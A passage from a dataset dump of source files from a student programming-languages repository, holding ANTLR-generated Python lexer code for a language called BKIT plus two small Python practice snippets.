\\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\6\\3S\\n\\3\\r\\3\\16\\3T\\3\\3\\6\\3\")\n buf.write(\"X\\n\\3\\r\\3\\16\\3Y\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\5\")\n buf.write(\"\\5e\\n\\5\\3\\6\\7\\6h\\n\\6\\f\\6\\16\\6k\\13\\6\\3\\7\\3\\7\\3\\b\\3\\b\\3\")\n buf.write(\"\\t\\3\\t\\3\\n\\5\\nt\\n\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\")\n buf.write(\"\\5\\r~\\n\\r\\3\\16\\3\\16\\3\\16\\6\\16\\u0083\\n\\16\\r\\16\\16\\16\\u0084\")\n buf.write(\"\\3\\17\\3\\17\\7\\17\\u0089\\n\\17\\f\\17\\16\\17\\u008c\\13\\17\\3\\20\")\n buf.write(\"\\6\\20\\u008f\\n\\20\\r\\20\\16\\20\\u0090\\3\\20\\3\\20\\5\\20\\u0095\")\n buf.write(\"\\n\\20\\3\\20\\5\\20\\u0098\\n\\20\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\")\n buf.write(\"\\23\\3\\24\\3\\24\\3\\25\\3\\25\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\")\n buf.write(\"\\3\\31\\3\\31\\3\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u00b0\\n\\32\\3\\32\\6\")\n buf.write(\"\\32\\u00b3\\n\\32\\r\\32\\16\\32\\u00b4\\3\\33\\6\\33\\u00b8\\n\\33\\r\")\n buf.write(\"\\33\\16\\33\\u00b9\\3\\34\\3\\34\\3\\34\\3\\34\\5\\34\\u00c0\\n\\34\\3\")\n buf.write(\"\\34\\6\\34\\u00c3\\n\\34\\r\\34\\16\\34\\u00c4\\3\\35\\3\\35\\5\\35\\u00c9\")\n buf.write(\"\\n\\35\\3\\36\\3\\36\\5\\36\\u00cd\\n\\36\\3\\37\\3\\37\\3\\37\\3\\37\\5\")\n buf.write(\"\\37\\u00d3\\n\\37\\3 \\3 \\3 \\6 \\u00d8\\n \\r \\16 \\u00d9\\3!\\3\")\n buf.write(\"!\\7!\\u00de\\n!\\f!\\16!\\u00e1\\13!\\3!\\3!\\3\\\"\\6\\\"\\u00e6\\n\\\"\")\n buf.write(\"\\r\\\"\\16\\\"\\u00e7\\3\\\"\\3\\\"\\3#\\3#\\7#\\u00ee\\n#\\f#\\16#\\u00f1\")\n buf.write(\"\\13#\\3#\\5#\\u00f4\\n#\\3$\\3$\\3%\\3%\\3%\\3%\\7%\\u00fc\\n%\\f%\\16\")\n buf.write(\"%\\u00ff\\13%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\7&\\u010a\\n&\\f&\")\n buf.write(\"\\16&\\u010d\\13&\\3&\\3&\\4\\u00fd\\u010b\\2\\'\\3\\3\\5\\4\\7\\5\\t\\6\")\n buf.write(\"\\13\\7\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2\")\n buf.write(\"!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\b\\65\\t\\67\\n9\\13;\\2=\")\n buf.write(\"\\2?\\fA\\rC\\16E\\17G\\20I\\21K\\22\\3\\2\\24\\3\\2c|\\3\\2C\\\\\\3\\2\\62\")\n buf.write(\";\\4\\2--//\\3\\2\\\"\\\"\\t\\2))^^ddhhppttvv\\t\\2$$))ddhhppttvv\")\n buf.write(\"\\3\\2^^\\3\\2gg\\3\\2\\60\\60\\3\\2))\\3\\2$$\\4\\2$$))\\5\\2\\62;CHc\")\n buf.write(\"h\\3\\2\\629\\6\\2\\n\\f\\16\\17))^^\\5\\2\\13\\f\\17\\17\\\"\\\"\\5\\3\\n\\13\")\n buf.write(\"\\16\\17^^\\2\\u0117\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\")\n buf.write(\"\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\")\n buf.write(\"\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2\")\n buf.write(\"E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\3M\\3\\2\\2\\2\")\n buf.write(\"\\5R\\3\\2\\2\\2\\7]\\3\\2\\2\\2\\t`\\3\\2\\2\\2\\13i\\3\\2\\2\\2\\rl\\3\\2\\2\")\n buf.write(\"\\2\\17n\\3\\2\\2\\2\\21p\\3\\2\\2\\2\\23s\\3\\2\\2\\2\\25u\\3\\2\\2\\2\\27\")\n buf.write(\"w\\3\\2\\2\\2\\31}\\3\\2\\2\\2\\33\\177\\3\\2\\2\\2\\35\\u0086\\3\\2\\2\\2\")\n buf.write(\"\\37\\u008e\\3\\2\\2\\2!\\u0099\\3\\2\\2\\2#\\u009b\\3\\2\\2\\2%\\u009d\")\n buf.write(\"\\3\\2\\2\\2\\'\\u009f\\3\\2\\2\\2)\\u00a1\\3\\2\\2\\2+\\u00a3\\3\\2\\2\\2\")\n buf.write(\"-\\u00a5\\3\\2\\2\\2/\\u00a7\\3\\2\\2\\2\\61\\u00a9\\3\\2\\2\\2\\63\\u00af\")\n buf.write(\"\\3\\2\\2\\2\\65\\u00b7\\3\\2\\2\\2\\67\\u00bf\\3\\2\\2\\29\\u00c8\\3\\2\")\n buf.write(\"\\2\\2;\\u00cc\\3\\2\\2\\2=\\u00d2\\3\\2\\2\\2?\\u00d4\\3\\2\\2\\2A\\u00db\")\n buf.write(\"\\3\\2\\2\\2C\\u00e5\\3\\2\\2\\2E\\u00eb\\3\\2\\2\\2G\\u00f5\\3\\2\\2\\2\")\n buf.write(\"I\\u00f7\\3\\2\\2\\2K\\u0105\\3\\2\\2\\2MN\\7$\\2\\2N\\4\\3\\2\\2\\2OP\\7\")\n buf.write(\"X\\2\\2PQ\\7c\\2\\2QS\\7t\\2\\2RO\\3\\2\\2\\2ST\\3\\2\\2\\2TR\\3\\2\\2\\2\")\n buf.write(\"TU\\3\\2\\2\\2UW\\3\\2\\2\\2VX\\5? \\2WV\\3\\2\\2\\2XY\\3\\2\\2\\2YW\\3\\2\")\n buf.write(\"\\2\\2YZ\\3\\2\\2\\2Z[\\3\\2\\2\\2[\\\\\\7=\\2\\2\\\\\\6\\3\\2\\2\\2]^\\5\\23\")\n buf.write(\"\\n\\2^_\\5\\37\\20\\2_\\b\\3\\2\\2\\2`d\\5\\23\\n\\2ae\\5\\65\\33\\2be\\5\")\n buf.write(\"\\63\\32\\2ce\\5\\67\\34\\2da\\3\\2\\2\\2db\\3\\2\\2\\2dc\\3\\2\\2\\2e\\n\")\n buf.write(\"\\3\\2\\2\\2fh\\5;\\36\\2gf\\3\\2\\2\\2hk\\3\\2\\2\\2ig\\3\\2\\2\\2ij\\3\\2\")\n buf.write(\"\\2\\2j\\f\\3\\2\\2\\2ki\\3\\2\\2\\2lm\\t\\2\\2\\2m\\16\\3\\2\\2\\2no\\t\\3\")\n buf.write(\"\\2\\2o\\20\\3\\2\\2\\2pq\\t\\4\\2\\2q\\22\\3\\2\\2\\2rt\\t\\5\\2\\2sr\\3\\2\")\n buf.write(\"\\2\\2st\\3\\2\\2\\2t\\24\\3\\2\\2\\2uv\\t\\6\\2\\2v\\26\\3\\2\\2\\2wx\\7^\")\n buf.write(\"\\2\\2xy\\t\\7\\2\\2y\\30\\3\\2\\2\\2z{\\7^\\2\\2{~\\n\\b\\2\\2|~\\n\\t\\2\")\n buf.write(\"\\2}z\\3\\2\\2\\2}|\\3\\2\\2\\2~\\32\\3\\2\\2\\2\\177\\u0080\\t\\n\\2\\2\\u0080\")\n buf.write(\"\\u0082\\5\\23\\n\\2\\u0081\\u0083\\5\\21\\t\\2\\u0082\\u0081\\3\\2\\2\")\n buf.write(\"\\2\\u0083\\u0084\\3\\2\\2\\2\\u0084\\u0082\\3\\2\\2\\2\\u0084\\u0085\")\n buf.write(\"\\3\\2\\2\\2\\u0085\\34\\3\\2\\2\\2\\u0086\\u008a\\t\\13\\2\\2\\u0087\\u0089\")\n buf.write(\"\\5\\21\\t\\2\\u0088\\u0087\\3\\2\\2\\2\\u0089\\u008c\\3\\2\\2\\2\\u008a\")\n buf.write(\"\\u0088\\3\\2\\2\\2\\u008a\\u008b\\3\\2\\2\\2\\u008b\\36\\3\\2\\2\\2\\u008c\")\n buf.write(\"\\u008a\\3\\2\\2\\2\\u008d\\u008f\\5\\21\\t\\2\\u008e\\u008d\\3\\2\\2\")\n buf.write(\"\\2\\u008f\\u0090\\3\\2\\2\\2\\u0090\\u008e\\3\\2\\2\\2\\u0090\\u0091\")\n buf.write(\"\\3\\2\\2\\2\\u0091\\u0097\\3\\2\\2\\2\\u0092\\u0094\\5\\35\\17\\2\\u0093\")\n buf.write(\"\\u0095\\5\\33\\16\\2\\u0094\\u0093\\3\\2\\2\\2\\u0094\\u0095\\3\\2\\2\")\n buf.write(\"\\2\\u0095\\u0098\\3\\2\\2\\2\\u0096\\u0098\\5\\33\\16\\2\\u0097\\u0092\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u0096\\3\\2\\2\\2\\u0098 \\3\\2\\2\\2\\u0099\\u009a\")\n buf.write(\"\\t\\f\\2\\2\\u009a\\\"\\3\\2\\2\\2\\u009b\\u009c\\t\\r\\2\\2\\u009c$\\3\")\n buf.write(\"\\2\\2\\2\\u009d\\u009e\\t\\16\\2\\2\\u009e&\\3\\2\\2\\2\\u009f\\u00a0\")\n buf.write(\"\\t\\17\\2\\2\\u00a0(\\3\\2\\2\\2\\u00a1\\u00a2\\t\\20\\2\\2\\u00a2*\\3\")\n buf.write(\"\\2\\2\\2\\u00a3\\u00a4\\7<\\2\\2\\u00a4,\\3\\2\\2\\2\\u00a5\\u00a6\\7\")\n buf.write(\"=\\2\\2\\u00a6.\\3\\2\\2\\2\\u00a7\\u00a8\\7\\60\\2\\2\\u00a8\\60\\3\\2\")\n buf.write(\"\\2\\2\\u00a9\\u00aa\\7.\\2\\2\\u00aa\\62\\3\\2\\2\\2\\u00ab\\u00ac\\7\")\n buf.write(\"\\62\\2\\2\\u00ac\\u00b0\\7z\\2\\2\\u00ad\\u00ae\\7\\62\\2\\2\\u00ae\")\n buf.write(\"\\u00b0\\7Z\\2\\2\\u00af\\u00ab\\3\\2\\2\\2\\u00af\\u00ad\\3\\2\\2\\2\")\n buf.write(\"\\u00b0\\u00b2\\3\\2\\2\\2\\u00b1\\u00b3\\5\\'\\24\\2\\u00b2\\u00b1\")\n buf.write(\"\\3\\2\\2\\2\\u00b3\\u00b4\\3\\2\\2\\2\\u00b4\\u00b2\\3\\2\\2\\2\\u00b4\")\n buf.write(\"\\u00b5\\3\\2\\2\\2\\u00b5\\64\\3\\2\\2\\2\\u00b6\\u00b8\\5\\21\\t\\2\\u00b7\")\n buf.write(\"\\u00b6\\3\\2\\2\\2\\u00b8\\u00b9\\3\\2\\2\\2\\u00b9\\u00b7\\3\\2\\2\\2\")\n buf.write(\"\\u00b9\\u00ba\\3\\2\\2\\2\\u00ba\\66\\3\\2\\2\\2\\u00bb\\u00bc\\7\\62\")\n buf.write(\"\\2\\2\\u00bc\\u00c0\\7q\\2\\2\\u00bd\\u00be\\7\\62\\2\\2\\u00be\\u00c0\")\n buf.write(\"\\7Q\\2\\2\\u00bf\\u00bb\\3\\2\\2\\2\\u00bf\\u00bd\\3\\2\\2\\2\\u00c0\")\n buf.write(\"\\u00c2\\3\\2\\2\\2\\u00c1\\u00c3\\5)\\25\\2\\u00c2\\u00c1\\3\\2\\2\\2\")\n buf.write(\"\\u00c3\\u00c4\\3\\2\\2\\2\\u00c4\\u00c2\\3\\2\\2\\2\\u00c4\\u00c5\\3\")\n buf.write(\"\\2\\2\\2\\u00c58\\3\\2\\2\\2\\u00c6\\u00c9\\5\\r\\7\\2\\u00c7\\u00c9\")\n buf.write(\"\\5\\17\\b\\2\\u00c8\\u00c6\\3\\2\\2\\2\\u00c8\\u00c7\\3\\2\\2\\2\\u00c9\")\n buf.write(\":\\3\\2\\2\\2\\u00ca\\u00cd\\n\\21\\2\\2\\u00cb\\u00cd\\5\\27\\f\\2\\u00cc\")\n buf.write(\"\\u00ca\\3\\2\\2\\2\\u00cc\\u00cb\\3\\2\\2\\2\\u00cd<\\3\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00d3\\5+\\26\\2\\u00cf\\u00d3\\5-\\27\\2\\u00d0\\u00d3\\5/\\30\\2\")\n buf.write(\"\\u00d1\\u00d3\\5\\61\\31\\2\\u00d2\\u00ce\\3\\2\\2\\2\\u00d2\\u00cf\")\n buf.write(\"\\3\\2\\2\\2\\u00d2\\u00d0\\3\\2\\2\\2\\u00d2\\u00d1\\3\\2\\2\\2\\u00d3\")\n buf.write(\">\\3\\2\\2\\2\\u00d4\\u00d7\\5\\r\\7\\2\\u00d5\\u00d8\\5\\r\\7\\2\\u00d6\")\n buf.write(\"\\u00d8\\5\\21\\t\\2\\u00d7\\u00d5\\3\\2\\2\\2\\u00d7\\u00d6\\3\\2\\2\")\n buf.write(\"\\2\\u00d8\\u00d9\\3\\2\\2\\2\\u00d9\\u00d7\\3\\2\\2\\2\\u00d9\\u00da\")\n buf.write(\"\\3\\2\\2\\2\\u00da@\\3\\2\\2\\2\\u00db\\u00df\\7$\\2\\2\\u00dc\\u00de\")\n buf.write(\"\\5;\\36\\2\\u00dd\\u00dc\\3\\2\\2\\2\\u00de\\u00e1\\3\\2\\2\\2\\u00df\")\n buf.write(\"\\u00dd\\3\\2\\2\\2\\u00df\\u00e0\\3\\2\\2\\2\\u00e0\\u00e2\\3\\2\\2\\2\")\n buf.write(\"\\u00e1\\u00df\\3\\2\\2\\2\\u00e2\\u00e3\\5\\31\\r\\2\\u00e3B\\3\\2\\2\")\n buf.write(\"\\2\\u00e4\\u00e6\\t\\22\\2\\2\\u00e5\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\")\n buf.write(\"\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\")\n buf.write(\"\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\b\\\"\\2\\2\\u00eaD\\3\\2\\2\\2\\u00eb\")\n buf.write(\"\\u00ef\\7$\\2\\2\\u00ec\\u00ee\\5;\\36\\2\\u00ed\\u00ec\\3\\2\\2\\2\")\n buf.write(\"\\u00ee\\u00f1\\3\\2\\2\\2\\u00ef\\u00ed\\3\\2\\2\\2\\u00ef\\u00f0\\3\")\n buf.write(\"\\2\\2\\2\\u00f0\\u00f3\\3\\2\\2\\2\\u00f1\\u00ef\\3\\2\\2\\2\\u00f2\\u00f4\")\n buf.write(\"\\t\\23\\2\\2\\u00f3\\u00f2\\3\\2\\2\\2\\u00f4F\\3\\2\\2\\2\\u00f5\\u00f6\")\n buf.write(\"\\13\\2\\2\\2\\u00f6H\\3\\2\\2\\2\\u00f7\\u00f8\\7,\\2\\2\\u00f8\\u00f9\")\n buf.write(\"\\7,\\2\\2\\u00f9\\u00fd\\3\\2\\2\\2\\u00fa\\u00fc\\13\\2\\2\\2\\u00fb\")\n buf.write(\"\\u00fa\\3\\2\\2\\2\\u00fc\\u00ff\\3\\2\\2\\2\\u00fd\\u00fe\\3\\2\\2\\2\")\n buf.write(\"\\u00fd\\u00fb\\3\\2\\2\\2\\u00fe\\u0100\\3\\2\\2\\2\\u00ff\\u00fd\\3\")\n buf.write(\"\\2\\2\\2\\u0100\\u0101\\7,\\2\\2\\u0101\\u0102\\7,\\2\\2\\u0102\\u0103\")\n buf.write(\"\\3\\2\\2\\2\\u0103\\u0104\\b%\\3\\2\\u0104J\\3\\2\\2\\2\\u0105\\u0106\")\n buf.write(\"\\7,\\2\\2\\u0106\\u0107\\7,\\2\\2\\u0107\\u010b\\3\\2\\2\\2\\u0108\\u010a\")\n buf.write(\"\\13\\2\\2\\2\\u0109\\u0108\\3\\2\\2\\2\\u010a\\u010d\\3\\2\\2\\2\\u010b\")\n buf.write(\"\\u010c\\3\\2\\2\\2\\u010b\\u0109\\3\\2\\2\\2\\u010c\\u010e\\3\\2\\2\\2\")\n buf.write(\"\\u010d\\u010b\\3\\2\\2\\2\\u010e\\u010f\\7\\2\\2\\3\\u010fL\\3\\2\\2\")\n buf.write(\"\\2\\36\\2TYdis}\\u0084\\u008a\\u0090\\u0094\\u0097\\u00af\\u00b4\")\n buf.write(\"\\u00b9\\u00bf\\u00c4\\u00c8\\u00cc\\u00d2\\u00d7\\u00d9\\u00df\")\n buf.write(\"\\u00e7\\u00ef\\u00f3\\u00fd\\u010b\\4\\b\\2\\2\\2\\3\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n T__0 = 1\n VAR = 2\n Real_number = 3\n Integer_number = 4\n String = 5\n HEXADECIMAL = 6\n DECIMAL = 7\n OCTAL = 8\n LETTER = 9\n ID = 10\n ILLEGAL_ESCAPE = 11\n WS = 12\n UNCLOSE_STRING = 13\n ERROR_CHAR = 14\n BLOCK_COMMENT = 15\n UNTERMINATED_COMMENT = 16\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'\\\"'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"VAR\", \"Real_number\", \"Integer_number\", \"String\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"LETTER\", \"ID\", \"ILLEGAL_ESCAPE\", \"WS\", \n \"UNCLOSE_STRING\", \"ERROR_CHAR\", \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n ruleNames = [ \"T__0\", \"VAR\", \"Real_number\", \"Integer_number\", \"String\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"SIGN\", \n \"SPACE\", \"ESCAPE_SEQUENCE\", \"ILLEGEL_ESC\", \"SCIENTIFIC\", \n \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"SING_QUOTE\", \"DOUBLE_QUOTE\", \n \"DOUBLE_QUOTE_IN_QUOTE\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \n \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"HEXADECIMAL\", \"DECIMAL\", \n \"OCTAL\", \"LETTER\", \"STRING_CHAR\", \"PUNCTUATION\", \"ID\", \n \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n" }, { "alpha_fraction": 0.4555555582046509, "alphanum_fraction": 0.47777777910232544, "avg_line_length": 10.375, "blob_id": "7ebe786c311e18b98ce99dfb0249cf6bfb8e32ca", "content_id": "5861c01cee63cc6835cc25b350f2bc5ef5a8981a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 20, "num_lines": 8, "path": "/Assignments/assignment2/src1.0/test.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class A:\n a:int\n b:int\n def print(self):\n print(a,b)\n\na = A(1,2)\na.print()" }, { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5784313678741455, "avg_line_length": 13.714285850524902, "blob_id": "7ecb7c8b3befdd9009f76f7282dcd84005b0348b", "content_id": "b987751d9994833ec8da80586ede5a7a4b3eab40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/FP/ProgCode.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "def powGen(x):\n def pow(y):\n return x**y\n return pow\n\nsquare = powGen(2)\nprint(square(3))" }, { "alpha_fraction": 0.29898977279663086, "alphanum_fraction": 0.565826952457428, "avg_line_length": 58.804264068603516, "blob_id": "2e3b103d52ce703884b94a22ffc6361d505891eb", "content_id": "8d5cac56bc95cc7c38a29c8e26f9e0c9fb446986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30884, "license_type": "no_license", "max_line_length": 121, "num_lines": 516, "path": "/Assignments/assignment3/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment3/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2M\")\n buf.write(\"\\u02bd\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n buf.write(\"U\\4V\\tV\\4W\\tW\\4X\\tX\\4Y\\tY\\4Z\\tZ\\4[\\t[\\4\\\\\\t\\\\\\3\\2\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\2\\7\\2\\u00bf\\n\\2\\f\\2\\16\\2\\u00c2\\13\\2\\3\\3\\3\\3\")\n buf.write(\"\\3\\4\\3\\4\\3\\5\\3\\5\\3\\6\\3\\6\\5\\6\\u00cc\\n\\6\\3\\7\\3\\7\\3\\7\\5\\7\")\n buf.write(\"\\u00d1\\n\\7\\3\\7\\6\\7\\u00d4\\n\\7\\r\\7\\16\\7\\u00d5\\3\\b\\3\\b\\7\")\n buf.write(\"\\b\\u00da\\n\\b\\f\\b\\16\\b\\u00dd\\13\\b\\3\\t\\6\\t\\u00e0\\n\\t\\r\\t\")\n buf.write(\"\\16\\t\\u00e1\\3\\t\\3\\t\\5\\t\\u00e6\\n\\t\\3\\t\\5\\t\\u00e9\\n\\t\\3\")\n buf.write(\"\\n\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\5\\r\")\n buf.write(\"\\u00f7\\n\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\20\\3\\20\\3\\20\\3\\20\\5\\20\")\n buf.write(\"\\u0101\\n\\20\\3\\20\\3\\20\\7\\20\\u0105\\n\\20\\f\\20\\16\\20\\u0108\")\n buf.write(\"\\13\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u010d\\n\\21\\f\\21\\16\\21\\u0110\")\n buf.write(\"\\13\\21\\5\\21\\u0112\\n\\21\\3\\22\\3\\22\\3\\22\\3\\22\\5\\22\\u0118\")\n buf.write(\"\\n\\22\\3\\22\\3\\22\\7\\22\\u011c\\n\\22\\f\\22\\16\\22\\u011f\\13\\22\")\n buf.write(\"\\3\\23\\3\\23\\3\\23\\5\\23\\u0124\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u012a\\n\\25\\3\\26\\3\\26\\7\\26\\u012e\\n\\26\\f\\26\\16\\26\\u0131\")\n buf.write(\"\\13\\26\\3\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\31\\3\\31\\3\\31\\3\\31\")\n buf.write(\"\\3\\31\\3\\31\\3\\31\\3\\32\\3\\32\\3\\32\\3\\33\\3\\33\\3\\33\\3\\33\\3\\33\")\n buf.write(\"\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3 \\3 \\3\")\n buf.write(\" \\3 \\3!\\3!\\3!\\3!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\")\n buf.write(\"#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3\")\n buf.write(\"%\\3%\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\")\n buf.write(\"\\3)\\3)\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3\")\n buf.write(\",\\3,\\3-\\3-\\3-\\3.\\3.\\3/\\3/\\3/\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\")\n buf.write(\"\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\64\\3\\64\\3\\65\\3\\65\\3\\66\\3\\66\")\n buf.write(\"\\3\\66\\3\\67\\3\\67\\3\\67\\38\\38\\38\\39\\39\\39\\3:\\3:\\3;\\3;\\3<\")\n buf.write(\"\\3<\\3<\\3=\\3=\\3=\\3>\\3>\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3\")\n buf.write(\"A\\3A\\3B\\3B\\3B\\3B\\3C\\3C\\3D\\3D\\3E\\3E\\3F\\3F\\3G\\3G\\3H\\3H\\3\")\n buf.write(\"I\\3I\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3O\\3O\\3O\\3O\\3\")\n buf.write(\"O\\3O\\3O\\3O\\3O\\3O\\3O\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3\")\n buf.write(\"P\\3P\\3P\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3R\\3R\\3\")\n buf.write(\"R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3S\\3S\\3S\\3S\\3\")\n buf.write(\"S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3T\\3T\\3T\\3T\\3T\\3T\\3T\\3\")\n buf.write(\"T\\3T\\3T\\3T\\3T\\3T\\3T\\3T\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3\")\n buf.write(\"U\\3U\\3U\\3U\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3\")\n 